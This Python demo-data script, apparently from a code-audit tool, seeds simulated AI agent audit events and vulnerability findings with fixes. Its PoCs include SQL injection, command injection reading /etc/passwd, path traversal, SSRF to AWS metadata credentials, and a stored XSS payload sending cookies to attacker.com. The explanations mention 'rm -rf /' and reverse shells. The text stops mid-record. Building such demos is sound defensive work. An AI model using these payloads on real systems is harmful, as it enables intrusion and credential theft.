CodeReview/backend/scripts/create_agent_demo_data.py

1297 lines
50 KiB
Python
Raw Normal View History

#!/usr/bin/env python3
"""
创建 Agent 审计任务演示数据
用于生成 HTML 报告示例展示
运行方式:
cd backend && python -m scripts.create_agent_demo_data
"""
import asyncio
import json
import uuid
import sys
import os
from datetime import datetime, timedelta, timezone
# 添加backend目录到路径
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from sqlalchemy.ext.asyncio import create_async_engine, AsyncSession
from sqlalchemy.orm import sessionmaker
from sqlalchemy.future import select
from app.core.config import settings
from app.models.user import User
from app.models.project import Project
from app.models.agent_task import (
AgentTask, AgentEvent, AgentFinding, AgentTreeNode, AgentCheckpoint,
AgentTaskStatus, AgentTaskPhase, AgentEventType,
VulnerabilitySeverity, VulnerabilityType, FindingStatus
)
# 演示数据配置
DEMO_PROJECT_NAME = "VulnWebApp - 安全演示项目"
DEMO_TASK_NAME = "智能漏洞挖掘审计 - 完整示例"
async def get_or_create_demo_project(db: AsyncSession, user_id: str) -> Project:
"""获取或创建演示项目"""
result = await db.execute(
select(Project).where(Project.name == DEMO_PROJECT_NAME)
)
project = result.scalars().first()
if not project:
project = Project(
name=DEMO_PROJECT_NAME,
description="用于演示 Agent 智能审计功能的示例 Web 应用项目,包含多种常见安全漏洞",
source_type="zip",
owner_id=user_id,
is_active=True,
default_branch="main",
programming_languages=json.dumps(["Python", "JavaScript", "SQL"]),
created_at=datetime.now(timezone.utc) - timedelta(days=7),
)
db.add(project)
await db.flush()
print(f"✓ 创建演示项目: {project.name}")
else:
print(f"演示项目已存在: {project.name}")
return project
async def create_agent_demo_task(db: AsyncSession, project: Project, user_id: str) -> AgentTask:
"""创建 Agent 审计任务演示数据"""
# 检查是否已存在
result = await db.execute(
select(AgentTask).where(AgentTask.name == DEMO_TASK_NAME)
)
existing = result.scalars().first()
if existing:
print(f"删除已存在的演示任务: {existing.id}")
await db.delete(existing)
await db.flush()
now = datetime.now(timezone.utc)
task_start = now - timedelta(minutes=15)
task_end = now - timedelta(minutes=2)
# 创建 Agent 任务
task = AgentTask(
id=str(uuid.uuid4()),
project_id=project.id,
created_by=user_id,
name=DEMO_TASK_NAME,
description="对 VulnWebApp 进行全面的安全漏洞扫描,包括 SQL 注入、XSS、命令注入等常见漏洞类型的检测与验证",
task_type="agent_audit",
# 配置
audit_scope={"include": ["**/*.py", "**/*.js", "**/*.html"], "exclude": ["tests/*", "node_modules/*"]},
target_vulnerabilities=["sql_injection", "xss", "command_injection", "path_traversal", "ssrf", "hardcoded_secret"],
verification_level="sandbox",
branch_name="main",
exclude_patterns=["*.test.py", "*.spec.js", "__pycache__/*"],
# LLM 配置
llm_config={"provider": "openai", "model": "gpt-4", "temperature": 0.1},
agent_config={"max_depth": 3, "enable_verification": True, "enable_poc_generation": True},
max_iterations=50,
token_budget=100000,
timeout_seconds=1800,
# 状态
status=AgentTaskStatus.COMPLETED,
current_phase=AgentTaskPhase.REPORTING,
current_step="报告生成完成",
# 进度统计
total_files=48,
indexed_files=48,
analyzed_files=48,
total_chunks=156,
# Agent 统计
total_iterations=32,
tool_calls_count=87,
tokens_used=45680,
# 发现统计
findings_count=8,
verified_count=6,
false_positive_count=1,
# 严重程度统计
critical_count=2,
high_count=3,
medium_count=2,
low_count=1,
# 评分
quality_score=72.5,
security_score=35.8,
# 审计计划
audit_plan={
"phases": [
{"name": "代码索引", "description": "建立代码向量索引,支持语义检索"},
{"name": "入口点识别", "description": "识别用户输入入口点和敏感API"},
{"name": "漏洞模式匹配", "description": "基于已知漏洞模式进行检测"},
{"name": "数据流分析", "description": "追踪污点数据流,验证漏洞可达性"},
{"name": "沙箱验证", "description": "在隔离环境中验证漏洞可利用性"},
{"name": "PoC 生成", "description": "为已验证漏洞生成概念验证代码"},
],
"focus_areas": ["用户认证模块", "数据库查询接口", "文件上传功能", "API 端点"],
},
# 时间戳
created_at=task_start - timedelta(minutes=1),
started_at=task_start,
completed_at=task_end,
)
db.add(task)
await db.flush()
print(f"✓ 创建 Agent 任务: {task.id}")
return task
async def create_agent_events(db: AsyncSession, task: AgentTask) -> list:
"""创建 Agent 事件流"""
events = []
base_time = task.started_at
sequence = 0
def add_event(event_type: str, message: str, phase: str = None,
tool_name: str = None, tool_input: dict = None,
tool_output: dict = None, tool_duration_ms: int = None,
finding_id: str = None, tokens_used: int = 0,
metadata: dict = None, time_offset_seconds: int = 0):
nonlocal sequence
sequence += 1
event = AgentEvent(
id=str(uuid.uuid4()),
task_id=task.id,
event_type=event_type,
phase=phase,
message=message,
tool_name=tool_name,
tool_input=tool_input,
tool_output=tool_output,
tool_duration_ms=tool_duration_ms,
finding_id=finding_id,
tokens_used=tokens_used,
event_metadata=metadata,
sequence=sequence,
created_at=base_time + timedelta(seconds=time_offset_seconds),
)
events.append(event)
return event
# ========== 任务启动 ==========
add_event(
AgentEventType.TASK_START,
"Agent 审计任务启动,开始智能漏洞挖掘",
metadata={"target_vulnerabilities": task.target_vulnerabilities},
time_offset_seconds=0
)
# ========== 规划阶段 ==========
add_event(
AgentEventType.PHASE_START,
"进入规划阶段 - 分析项目结构,制定审计策略",
phase=AgentTaskPhase.PLANNING,
time_offset_seconds=5
)
add_event(
AgentEventType.THINKING,
"分析项目结构:检测到 Flask Web 应用框架,包含用户认证、数据库操作、文件处理等模块。重点关注 SQL 注入、XSS、命令注入等高危漏洞。",
phase=AgentTaskPhase.PLANNING,
tokens_used=450,
time_offset_seconds=10
)
add_event(
AgentEventType.PLANNING,
"制定审计计划1) 索引代码库 2) 识别入口点 3) 模式匹配检测 4) 数据流分析 5) 沙箱验证 6) 生成报告",
phase=AgentTaskPhase.PLANNING,
tokens_used=380,
time_offset_seconds=15
)
add_event(
AgentEventType.PHASE_COMPLETE,
"规划阶段完成,识别出 12 个高优先级检查点",
phase=AgentTaskPhase.PLANNING,
time_offset_seconds=20
)
# ========== 索引阶段 ==========
add_event(
AgentEventType.PHASE_START,
"进入索引阶段 - 构建代码向量索引",
phase=AgentTaskPhase.INDEXING,
time_offset_seconds=25
)
add_event(
AgentEventType.TOOL_CALL,
"调用 RAG 索引工具,处理源代码文件",
phase=AgentTaskPhase.INDEXING,
tool_name="rag_index",
tool_input={"paths": ["app/", "routes/", "models/", "utils/"], "chunk_size": 1500},
time_offset_seconds=30
)
add_event(
AgentEventType.RAG_RESULT,
"代码索引完成48 个文件156 个代码块,向量维度 1536",
phase=AgentTaskPhase.INDEXING,
tool_name="rag_index",
tool_output={"files_indexed": 48, "chunks_created": 156, "vector_dim": 1536},
tool_duration_ms=8500,
time_offset_seconds=45
)
add_event(
AgentEventType.PHASE_COMPLETE,
"索引阶段完成",
phase=AgentTaskPhase.INDEXING,
time_offset_seconds=50
)
# ========== 分析阶段 ==========
add_event(
AgentEventType.PHASE_START,
"进入分析阶段 - 执行漏洞检测",
phase=AgentTaskPhase.ANALYSIS,
time_offset_seconds=55
)
# SQL 注入检测
add_event(
AgentEventType.THINKING,
"开始检测 SQL 注入漏洞:搜索数据库查询相关代码,识别用户输入拼接到 SQL 语句的模式",
phase=AgentTaskPhase.ANALYSIS,
tokens_used=320,
time_offset_seconds=60
)
add_event(
AgentEventType.RAG_QUERY,
"语义检索:查找 SQL 查询和用户输入处理代码",
phase=AgentTaskPhase.ANALYSIS,
tool_name="rag_search",
tool_input={"query": "SQL query user input parameter database execute", "top_k": 10},
time_offset_seconds=65
)
add_event(
AgentEventType.TOOL_CALL,
"读取文件: app/routes/user.py",
phase=AgentTaskPhase.ANALYSIS,
tool_name="read_file",
tool_input={"path": "app/routes/user.py", "start_line": 45, "end_line": 80},
time_offset_seconds=70
)
add_event(
AgentEventType.FINDING_NEW,
"发现 SQL 注入漏洞 [Critical]",
phase=AgentTaskPhase.ANALYSIS,
metadata={"vulnerability_type": "sql_injection", "severity": "critical", "file": "app/routes/user.py", "line": 52},
time_offset_seconds=80
)
# XSS 检测
add_event(
AgentEventType.THINKING,
"开始检测 XSS 漏洞:搜索 HTML 渲染和用户输入输出相关代码",
phase=AgentTaskPhase.ANALYSIS,
tokens_used=280,
time_offset_seconds=120
)
add_event(
AgentEventType.TOOL_CALL,
"读取文件: app/templates/comment.html",
phase=AgentTaskPhase.ANALYSIS,
tool_name="read_file",
tool_input={"path": "app/templates/comment.html"},
time_offset_seconds=130
)
add_event(
AgentEventType.FINDING_NEW,
"发现存储型 XSS 漏洞 [High]",
phase=AgentTaskPhase.ANALYSIS,
metadata={"vulnerability_type": "xss", "severity": "high", "file": "app/templates/comment.html", "line": 28},
time_offset_seconds=145
)
# 命令注入检测
add_event(
AgentEventType.RAG_QUERY,
"语义检索:查找系统命令执行相关代码",
phase=AgentTaskPhase.ANALYSIS,
tool_name="rag_search",
tool_input={"query": "os.system subprocess shell command execute", "top_k": 10},
time_offset_seconds=180
)
add_event(
AgentEventType.FINDING_NEW,
"发现命令注入漏洞 [Critical]",
phase=AgentTaskPhase.ANALYSIS,
metadata={"vulnerability_type": "command_injection", "severity": "critical", "file": "app/utils/backup.py", "line": 34},
time_offset_seconds=210
)
# 路径遍历检测
add_event(
AgentEventType.TOOL_CALL,
"分析文件操作代码",
phase=AgentTaskPhase.ANALYSIS,
tool_name="analyze_code",
tool_input={"pattern": "file path user input", "scope": "app/routes/"},
time_offset_seconds=250
)
add_event(
AgentEventType.FINDING_NEW,
"发现路径遍历漏洞 [High]",
phase=AgentTaskPhase.ANALYSIS,
metadata={"vulnerability_type": "path_traversal", "severity": "high", "file": "app/routes/download.py", "line": 18},
time_offset_seconds=280
)
# SSRF 检测
add_event(
AgentEventType.FINDING_NEW,
"发现 SSRF 漏洞 [High]",
phase=AgentTaskPhase.ANALYSIS,
metadata={"vulnerability_type": "ssrf", "severity": "high", "file": "app/routes/proxy.py", "line": 42},
time_offset_seconds=320
)
# 硬编码密钥检测
add_event(
AgentEventType.TOOL_CALL,
"扫描硬编码密钥和敏感信息",
phase=AgentTaskPhase.ANALYSIS,
tool_name="secret_scan",
tool_input={"patterns": ["api_key", "password", "secret", "token"]},
time_offset_seconds=360
)
add_event(
AgentEventType.FINDING_NEW,
"发现硬编码 API 密钥 [Medium]",
phase=AgentTaskPhase.ANALYSIS,
metadata={"vulnerability_type": "hardcoded_secret", "severity": "medium", "file": "app/config.py", "line": 15},
time_offset_seconds=380
)
add_event(
AgentEventType.FINDING_NEW,
"发现弱加密配置 [Medium]",
phase=AgentTaskPhase.ANALYSIS,
metadata={"vulnerability_type": "weak_crypto", "severity": "medium", "file": "app/utils/crypto.py", "line": 8},
time_offset_seconds=400
)
add_event(
AgentEventType.FINDING_NEW,
"发现调试模式未关闭 [Low]",
phase=AgentTaskPhase.ANALYSIS,
metadata={"vulnerability_type": "security_misconfiguration", "severity": "low", "file": "app/__init__.py", "line": 25},
time_offset_seconds=420
)
add_event(
AgentEventType.PHASE_COMPLETE,
"分析阶段完成,发现 8 个潜在漏洞",
phase=AgentTaskPhase.ANALYSIS,
time_offset_seconds=450
)
# ========== 验证阶段 ==========
add_event(
AgentEventType.PHASE_START,
"进入验证阶段 - 在沙箱环境中验证漏洞",
phase=AgentTaskPhase.VERIFICATION,
time_offset_seconds=460
)
# SQL 注入验证
add_event(
AgentEventType.SANDBOX_START,
"启动沙箱环境验证 SQL 注入漏洞",
phase=AgentTaskPhase.VERIFICATION,
tool_name="sandbox",
time_offset_seconds=470
)
add_event(
AgentEventType.SANDBOX_EXEC,
"执行 SQL 注入 PoC' OR '1'='1' --",
phase=AgentTaskPhase.VERIFICATION,
tool_name="sandbox",
tool_input={"payload": "' OR '1'='1' --", "target": "/api/user/search?name="},
time_offset_seconds=480
)
add_event(
AgentEventType.SANDBOX_RESULT,
"SQL 注入验证成功 - 成功绕过认证获取所有用户数据",
phase=AgentTaskPhase.VERIFICATION,
tool_name="sandbox",
tool_output={"success": True, "response_code": 200, "data_leaked": True},
tool_duration_ms=1200,
time_offset_seconds=490
)
add_event(
AgentEventType.FINDING_VERIFIED,
"SQL 注入漏洞已验证 [Critical]",
phase=AgentTaskPhase.VERIFICATION,
time_offset_seconds=495
)
# 命令注入验证
add_event(
AgentEventType.SANDBOX_EXEC,
"执行命令注入 PoC; id; whoami",
phase=AgentTaskPhase.VERIFICATION,
tool_name="sandbox",
tool_input={"payload": "; id; whoami", "target": "/api/backup?filename="},
time_offset_seconds=520
)
add_event(
AgentEventType.SANDBOX_RESULT,
"命令注入验证成功 - 成功执行任意系统命令",
phase=AgentTaskPhase.VERIFICATION,
tool_name="sandbox",
tool_output={"success": True, "output": "uid=1000(www-data) gid=1000(www-data)"},
tool_duration_ms=800,
time_offset_seconds=535
)
add_event(
AgentEventType.FINDING_VERIFIED,
"命令注入漏洞已验证 [Critical]",
phase=AgentTaskPhase.VERIFICATION,
time_offset_seconds=540
)
# XSS 验证
add_event(
AgentEventType.SANDBOX_EXEC,
"执行 XSS PoC<script>alert('XSS')</script>",
phase=AgentTaskPhase.VERIFICATION,
tool_name="sandbox",
tool_input={"payload": "<script>alert('XSS')</script>", "target": "/api/comment"},
time_offset_seconds=560
)
add_event(
AgentEventType.FINDING_VERIFIED,
"存储型 XSS 漏洞已验证 [High]",
phase=AgentTaskPhase.VERIFICATION,
time_offset_seconds=580
)
# 路径遍历验证
add_event(
AgentEventType.SANDBOX_EXEC,
"执行路径遍历 PoC../../../etc/passwd",
phase=AgentTaskPhase.VERIFICATION,
tool_name="sandbox",
tool_input={"payload": "../../../etc/passwd", "target": "/api/download?file="},
time_offset_seconds=600
)
add_event(
AgentEventType.FINDING_VERIFIED,
"路径遍历漏洞已验证 [High]",
phase=AgentTaskPhase.VERIFICATION,
time_offset_seconds=620
)
# SSRF 验证
add_event(
AgentEventType.SANDBOX_EXEC,
"执行 SSRF PoChttp://169.254.169.254/latest/meta-data/",
phase=AgentTaskPhase.VERIFICATION,
tool_name="sandbox",
tool_input={"payload": "http://169.254.169.254/latest/meta-data/", "target": "/api/proxy?url="},
time_offset_seconds=640
)
add_event(
AgentEventType.FINDING_VERIFIED,
"SSRF 漏洞已验证 [High]",
phase=AgentTaskPhase.VERIFICATION,
time_offset_seconds=660
)
# 误报排除
add_event(
AgentEventType.THINKING,
"验证硬编码密钥:检查是否为测试/示例配置",
phase=AgentTaskPhase.VERIFICATION,
tokens_used=180,
time_offset_seconds=680
)
add_event(
AgentEventType.FINDING_FALSE_POSITIVE,
"硬编码密钥为误报 - 该文件为示例配置模板",
phase=AgentTaskPhase.VERIFICATION,
metadata={"reason": "File is example configuration template, not production code"},
time_offset_seconds=700
)
add_event(
AgentEventType.PHASE_COMPLETE,
"验证阶段完成6 个漏洞已验证1 个误报已排除",
phase=AgentTaskPhase.VERIFICATION,
time_offset_seconds=720
)
# ========== 报告阶段 ==========
add_event(
AgentEventType.PHASE_START,
"进入报告阶段 - 生成安全审计报告",
phase=AgentTaskPhase.REPORTING,
time_offset_seconds=730
)
add_event(
AgentEventType.TOOL_CALL,
"生成漏洞详情和修复建议",
phase=AgentTaskPhase.REPORTING,
tool_name="generate_report",
tool_input={"format": "html", "include_poc": True, "include_fix": True},
time_offset_seconds=740
)
add_event(
AgentEventType.INFO,
"报告生成完成:包含 8 个发现、6 个已验证漏洞、详细修复建议和 PoC 代码",
phase=AgentTaskPhase.REPORTING,
time_offset_seconds=760
)
add_event(
AgentEventType.PHASE_COMPLETE,
"报告阶段完成",
phase=AgentTaskPhase.REPORTING,
time_offset_seconds=770
)
# ========== 任务完成 ==========
add_event(
AgentEventType.TASK_COMPLETE,
"Agent 审计任务完成!发现 8 个安全问题,其中 2 个严重、3 个高危、2 个中危、1 个低危",
metadata={
"total_findings": 8,
"verified": 6,
"false_positives": 1,
"severity_distribution": {"critical": 2, "high": 3, "medium": 2, "low": 1},
"duration_seconds": 780,
"tokens_used": 45680,
},
time_offset_seconds=780
)
# 批量保存事件
for event in events:
db.add(event)
await db.flush()
print(f"✓ 创建了 {len(events)} 个 Agent 事件")
return events
async def create_agent_findings(db: AsyncSession, task: AgentTask) -> list:
"""创建 Agent 发现的漏洞"""
findings_data = [
{
"vulnerability_type": VulnerabilityType.SQL_INJECTION,
"severity": VulnerabilitySeverity.CRITICAL,
"title": "用户搜索接口存在 SQL 注入漏洞",
"description": "在 /api/user/search 接口中,用户输入的 name 参数直接拼接到 SQL 查询语句中,未经过任何过滤或参数化处理,攻击者可以通过构造恶意输入执行任意 SQL 语句。",
"file_path": "app/routes/user.py",
"line_start": 52,
"line_end": 58,
"function_name": "search_user",
"code_snippet": '''@app.route('/api/user/search')
def search_user():
name = request.args.get('name', '')
# 危险直接拼接用户输入到SQL语句
query = f"SELECT * FROM users WHERE name LIKE '%{name}%'"
result = db.execute(query)
return jsonify(result.fetchall())''',
"source": "request.args.get('name')",
"sink": "db.execute(query)",
"dataflow_path": [
{"step": 1, "location": "line 54", "description": "用户输入从 request.args.get() 获取"},
{"step": 2, "location": "line 56", "description": "用户输入直接拼接到 SQL 字符串"},
{"step": 3, "location": "line 57", "description": "拼接后的 SQL 被执行"},
],
"status": FindingStatus.VERIFIED,
"is_verified": True,
"verification_method": "沙箱验证 - 成功执行 SQL 注入攻击",
"verification_result": {"success": True, "payload": "' OR '1'='1' --", "impact": "绕过认证,获取所有用户数据"},
"has_poc": True,
"poc_code": '''import requests
# SQL 注入 PoC
target_url = "http://target.com/api/user/search"
# Payload: 绕过认证获取所有用户
payload = "' OR '1'='1' --"
response = requests.get(target_url, params={"name": payload})
print(f"Status: {response.status_code}")
print(f"Data: {response.json()}")
# 预期结果:返回所有用户数据,而非仅匹配搜索条件的用户''',
"poc_description": "通过在 name 参数中注入 SQL 语句,绕过查询条件获取数据库中所有用户信息",
"poc_steps": [
"访问目标 URL: /api/user/search?name=' OR '1'='1' --",
"观察响应:应返回所有用户数据",
"进一步利用:可尝试 UNION 注入获取其他表数据",
],
"suggestion": "使用参数化查询或 ORM 框架来防止 SQL 注入",
"fix_code": '''@app.route('/api/user/search')
def search_user():
name = request.args.get('name', '')
# 修复:使用参数化查询
query = "SELECT * FROM users WHERE name LIKE :name"
result = db.execute(query, {"name": f"%{name}%"})
return jsonify(result.fetchall())''',
"fix_description": "使用 SQLAlchemy 的参数化查询功能,将用户输入作为参数传递,而非直接拼接到 SQL 语句中",
"references": [
{"type": "CWE", "id": "CWE-89", "url": "https://cwe.mitre.org/data/definitions/89.html"},
{"type": "OWASP", "id": "A03:2021", "url": "https://owasp.org/Top10/A03_2021-Injection/"},
],
"ai_explanation": "这是一个典型的 SQL 注入漏洞。代码直接将用户输入拼接到 SQL 查询字符串中,没有进行任何转义或参数化处理。攻击者可以通过特殊字符(如单引号)闭合原有的 SQL 语句,然后注入自己的 SQL 代码。",
"ai_confidence": 0.98,
"xai_what": "SQL 注入是一种代码注入技术,攻击者通过在输入字段中插入恶意 SQL 代码来操纵数据库查询。",
"xai_why": "该漏洞存在是因为开发者直接将用户输入拼接到 SQL 语句中,没有使用参数化查询或进行输入验证。",
"xai_how": "攻击者可以在 name 参数中输入 ' OR '1'='1' -- 来绕过查询条件,或使用 UNION SELECT 来获取其他表的数据。",
"xai_impact": "攻击者可以1) 绕过认证 2) 读取敏感数据 3) 修改或删除数据 4) 在某些情况下执行系统命令。",
"cvss_score": 9.8,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"tags": ["owasp-top10", "injection", "database", "authentication-bypass"],
},
{
"vulnerability_type": VulnerabilityType.COMMAND_INJECTION,
"severity": VulnerabilitySeverity.CRITICAL,
"title": "备份功能存在命令注入漏洞",
"description": "在备份功能中,用户提供的文件名参数直接传递给 os.system() 函数执行,攻击者可以通过命令分隔符(如 ; 或 |)注入任意系统命令。",
"file_path": "app/utils/backup.py",
"line_start": 34,
"line_end": 40,
"function_name": "create_backup",
"code_snippet": '''def create_backup(filename):
"""创建备份文件"""
# 危险:直接将用户输入传递给系统命令
backup_path = f"/backups/{filename}.tar.gz"
cmd = f"tar -czf {backup_path} /data/"
os.system(cmd) # 命令注入风险
return backup_path''',
"source": "filename 参数",
"sink": "os.system(cmd)",
"dataflow_path": [
{"step": 1, "location": "line 34", "description": "filename 参数从外部传入"},
{"step": 2, "location": "line 36", "description": "filename 拼接到 shell 命令"},
{"step": 3, "location": "line 37", "description": "命令通过 os.system() 执行"},
],
"status": FindingStatus.VERIFIED,
"is_verified": True,
"verification_method": "沙箱验证 - 成功执行任意命令",
"verification_result": {"success": True, "payload": "; id; whoami", "output": "uid=1000(www-data)"},
"has_poc": True,
"poc_code": '''import requests
# 命令注入 PoC
target_url = "http://target.com/api/backup"
# Payload: 注入系统命令
payload = "test; id; cat /etc/passwd"
response = requests.post(target_url, json={"filename": payload})
print(f"Response: {response.text}")
# 预期结果:服务器执行 id 和 cat /etc/passwd 命令''',
"poc_description": "通过在 filename 参数中注入分号和系统命令,在服务器上执行任意代码",
"poc_steps": [
"构造恶意 filename: test; id; cat /etc/passwd",
"发送请求到 /api/backup 接口",
"观察服务器响应或日志中的命令执行结果",
],
"suggestion": "避免使用 os.system(),改用 subprocess 模块并禁用 shell=True对用户输入进行严格的白名单验证",
"fix_code": '''import subprocess
import re
def create_backup(filename):
"""创建备份文件 - 安全版本"""
# 修复:验证文件名只包含安全字符
if not re.match(r'^[a-zA-Z0-9_-]+$', filename):
raise ValueError("Invalid filename")
backup_path = f"/backups/{filename}.tar.gz"
# 修复:使用 subprocess 并传递参数列表
subprocess.run(
["tar", "-czf", backup_path, "/data/"],
check=True,
shell=False # 禁用shell
)
return backup_path''',
"fix_description": "1) 使用正则表达式验证文件名只包含安全字符 2) 使用 subprocess.run() 替代 os.system() 3) 禁用 shell 模式,将参数作为列表传递",
"references": [
{"type": "CWE", "id": "CWE-78", "url": "https://cwe.mitre.org/data/definitions/78.html"},
{"type": "OWASP", "id": "A03:2021", "url": "https://owasp.org/Top10/A03_2021-Injection/"},
],
"ai_explanation": "这是一个严重的命令注入漏洞。os.system() 函数会通过 shell 执行命令,当用户输入被直接拼接到命令字符串中时,攻击者可以使用 shell 的特殊字符(如 ;、|、&&)来注入额外的命令。",
"ai_confidence": 0.99,
"xai_what": "命令注入允许攻击者在目标系统上执行任意操作系统命令。",
"xai_why": "该漏洞存在是因为用户输入直接拼接到 shell 命令中,没有进行任何过滤或转义。",
"xai_how": "攻击者可以在 filename 参数中输入 ; rm -rf / 来删除服务器文件,或执行反弹 shell 获取服务器控制权。",
"xai_impact": "完全的服务器控制权,包括:读取敏感文件、安装后门、横向移动、数据窃取、服务中断等。",
"cvss_score": 10.0,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"tags": ["owasp-top10", "injection", "rce", "critical"],
},
{
"vulnerability_type": VulnerabilityType.XSS,
"severity": VulnerabilitySeverity.HIGH,
"title": "评论功能存在存储型 XSS 漏洞",
"description": "用户提交的评论内容在展示时未经 HTML 转义直接渲染,攻击者可以在评论中注入恶意 JavaScript 代码,当其他用户查看评论时会执行这些代码。",
"file_path": "app/templates/comment.html",
"line_start": 28,
"line_end": 32,
"function_name": None,
"code_snippet": '''<div class="comment-list">
{% for comment in comments %}
<div class="comment-item">
<p class="comment-content">{{ comment.content | safe }}</p>
<!-- 危险使用 safe 过滤器禁用了自动转义 -->
</div>
{% endfor %}
</div>''',
"source": "comment.content (用户提交的评论)",
"sink": "{{ comment.content | safe }}",
"status": FindingStatus.VERIFIED,
"is_verified": True,
"verification_method": "沙箱验证 - XSS payload 成功执行",
"verification_result": {"success": True, "payload": "<script>alert('XSS')</script>"},
"has_poc": True,
"poc_code": """import requests
# 存储型 XSS PoC
target_url = "http://target.com/api/comment"
# Payload: 窃取用户 Cookie
payload = '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>'
response = requests.post(target_url, json={"content": payload})
print(f"Comment posted: {response.status_code}")
# 当其他用户访问评论页面时,恶意脚本会自动执行""",
"poc_description": "通过在评论中注入 JavaScript 代码,当其他用户查看页面时窃取其 Cookie",
"suggestion": "移除 safe 过滤器,让 Jinja2 自动转义 HTML 特殊字符",
"fix_code": '''<div class="comment-list">
{% for comment in comments %}
<div class="comment-item">
<!-- 修复移除 safe 过滤器使用自动转义 -->
<p class="comment-content">{{ comment.content }}</p>
</div>
{% endfor %}
</div>''',
"fix_description": "移除 | safe 过滤器,让 Jinja2 模板引擎自动对用户内容进行 HTML 转义",
"references": [
{"type": "CWE", "id": "CWE-79", "url": "https://cwe.mitre.org/data/definitions/79.html"},
{"type": "OWASP", "id": "A03:2021", "url": "https://owasp.org/Top10/A03_2021-Injection/"},
],
"ai_confidence": 0.96,
"xai_what": "存储型 XSS 是指恶意脚本被永久存储在目标服务器上,当用户访问包含该脚本的页面时会自动执行。",
"xai_why": "该漏洞存在是因为模板使用了 safe 过滤器,禁用了 Jinja2 的自动 HTML 转义功能。",
"xai_how": "攻击者提交包含 <script> 标签的评论,当其他用户浏览评论时,恶意脚本会在其浏览器中执行。",
"xai_impact": "会话劫持、钓鱼攻击、恶意重定向、键盘记录、加密货币挖矿等。",
"cvss_score": 8.1,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N",
"tags": ["owasp-top10", "xss", "stored-xss", "frontend"],
},
{
"vulnerability_type": VulnerabilityType.PATH_TRAVERSAL,
"severity": VulnerabilitySeverity.HIGH,
"title": "文件下载接口存在路径遍历漏洞",
"description": "文件下载接口直接使用用户提供的文件名参数构建文件路径,没有验证路径是否在允许的目录范围内,攻击者可以使用 ../ 序列访问任意文件。",
"file_path": "app/routes/download.py",
"line_start": 18,
"line_end": 26,
"function_name": "download_file",
"code_snippet": '''@app.route('/api/download')
def download_file():
filename = request.args.get('file')
# 危险:直接拼接用户输入构建路径
file_path = os.path.join('/uploads/', filename)
if os.path.exists(file_path):
return send_file(file_path)
return "File not found", 404''',
"source": "request.args.get('file')",
"sink": "send_file(file_path)",
"status": FindingStatus.VERIFIED,
"is_verified": True,
"verification_method": "沙箱验证 - 成功读取 /etc/passwd",
"verification_result": {"success": True, "payload": "../../../etc/passwd", "file_read": True},
"has_poc": True,
"poc_code": '''import requests
# 路径遍历 PoC
target_url = "http://target.com/api/download"
# Payload: 读取系统敏感文件
payload = "../../../etc/passwd"
response = requests.get(target_url, params={"file": payload})
print(f"File content:\\n{response.text}")''',
"suggestion": "使用 os.path.realpath() 解析路径后验证是否在允许的目录内",
"fix_code": '''import os
from pathlib import Path
UPLOAD_DIR = Path('/uploads/').resolve()
@app.route('/api/download')
def download_file():
filename = request.args.get('file')
# 修复:解析真实路径并验证
file_path = (UPLOAD_DIR / filename).resolve()
# 确保文件在允许的目录内
if not str(file_path).startswith(str(UPLOAD_DIR)):
return "Access denied", 403
if file_path.exists():
return send_file(file_path)
return "File not found", 404''',
"references": [
{"type": "CWE", "id": "CWE-22", "url": "https://cwe.mitre.org/data/definitions/22.html"},
],
"ai_confidence": 0.95,
"cvss_score": 7.5,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"tags": ["path-traversal", "file-read", "lfi"],
},
{
"vulnerability_type": VulnerabilityType.SSRF,
"severity": VulnerabilitySeverity.HIGH,
"title": "代理接口存在 SSRF 漏洞",
"description": "代理接口接受用户提供的 URL 并发起请求,没有验证目标地址,攻击者可以利用此漏洞访问内网资源或云元数据服务。",
"file_path": "app/routes/proxy.py",
"line_start": 42,
"line_end": 50,
"function_name": "proxy_request",
"code_snippet": '''@app.route('/api/proxy')
def proxy_request():
target_url = request.args.get('url')
# 危险:直接请求用户提供的 URL
response = requests.get(target_url)
return response.content''',
"source": "request.args.get('url')",
"sink": "requests.get(target_url)",
"status": FindingStatus.VERIFIED,
"is_verified": True,
"verification_method": "沙箱验证 - 成功访问内网元数据服务",
"verification_result": {"success": True, "payload": "http://169.254.169.254/latest/meta-data/"},
"has_poc": True,
"poc_code": '''import requests
# SSRF PoC - 访问 AWS 元数据
target_url = "http://target.com/api/proxy"
payload = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
response = requests.get(target_url, params={"url": payload})
print(f"AWS Credentials:\\n{response.text}")''',
"suggestion": "实现 URL 白名单验证,禁止访问内网地址和元数据服务",
"fix_code": '''from urllib.parse import urlparse
import ipaddress
ALLOWED_HOSTS = ['api.example.com', 'cdn.example.com']
def is_safe_url(url):
parsed = urlparse(url)
# 检查协议
if parsed.scheme not in ['http', 'https']:
return False
# 检查是否在白名单
if parsed.hostname not in ALLOWED_HOSTS:
return False
# 检查是否为内网地址
try:
ip = ipaddress.ip_address(parsed.hostname)
if ip.is_private or ip.is_loopback:
return False
except ValueError:
pass
return True
@app.route('/api/proxy')
def proxy_request():
target_url = request.args.get('url')
if not is_safe_url(target_url):
return "Invalid URL", 400
response = requests.get(target_url, timeout=5)
return response.content''',
"references": [
{"type": "CWE", "id": "CWE-918", "url": "https://cwe.mitre.org/data/definitions/918.html"},
{"type": "OWASP", "id": "A10:2021", "url": "https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/"},
],
"ai_confidence": 0.94,
"cvss_score": 8.6,
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
"tags": ["owasp-top10", "ssrf", "cloud-metadata"],
},
{
"vulnerability_type": VulnerabilityType.HARDCODED_SECRET,
"severity": VulnerabilitySeverity.MEDIUM,
"title": "发现硬编码的 API 密钥(误报)",
"description": "在配置文件中发现硬编码的 API 密钥,经验证为示例配置模板中的占位符。",
"file_path": "app/config.py.example",
"line_start": 15,
"line_end": 18,
"code_snippet": '''# 示例配置文件 - 请复制为 config.py 并替换实际值
